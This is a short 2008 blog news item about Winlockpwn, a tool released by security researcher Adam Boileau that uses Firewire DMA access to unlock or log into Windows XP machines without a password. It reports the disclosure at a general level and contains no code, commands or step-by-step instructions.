11 March 2008

Winlockpwn - Bypass Windows Authentication via Firewire

Adam Boileau, a security consultant from New Zealand, has released a tool to unlock a Windows PC in seconds by bypassing the standard Login/Password requirement.

The Python script, called Winlockpwn takes advantage of a vulnerability in Windows' handling of the Firewire port, and allows a hacker to unlock locked Windows machines or even login without a password, merely by physically connecting a Linux based computer to the victim's Firewire port and executing a command.

The hack affects all Windows XP machines, and there are reports of a Vista attack being successful using a slightly modified version. Unlike USB2, the IEEE1394 / Firewire specification allows devices to have full DMA access which is independent of the operating system, so other operating systems such as BSD, Linux and Mac OS X may also be susceptible.

This hack was first demonstrated by Adam Boileau at the Ruxcon security conference in Sydney in 2006, but Microsoft has not taken it seriously enough to develop a fix.

No comments: